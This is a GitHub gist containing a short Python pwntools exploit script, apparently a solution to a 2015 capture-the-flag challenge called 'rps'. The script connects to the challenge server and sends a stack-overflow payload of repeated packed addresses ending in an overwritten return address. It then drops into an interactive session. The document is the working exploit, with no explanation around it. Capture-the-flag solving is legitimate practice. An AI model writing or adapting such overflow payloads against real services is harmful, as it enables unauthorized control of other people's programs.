Skip to content

Instantly share code, notes, and snippets.

@m---

m---/rps.py Secret

Created September 8, 2015 15:24
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save m---/4ea8e926cc716b0c74c1 to your computer and use it in GitHub Desktop.
Save m---/4ea8e926cc716b0c74c1 to your computer and use it in GitHub Desktop.
from pwn import *
p = p64
s = remote('milkyway.chal.mmactf.link', 1641)
#s = remote('localhost', 4000)
#s = process('./rps')
print s.recvuntil('What\'s your name: ')
s.send((p(0x601100 + 4) * 11) + p(0x4008B4) + '\n')
print s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment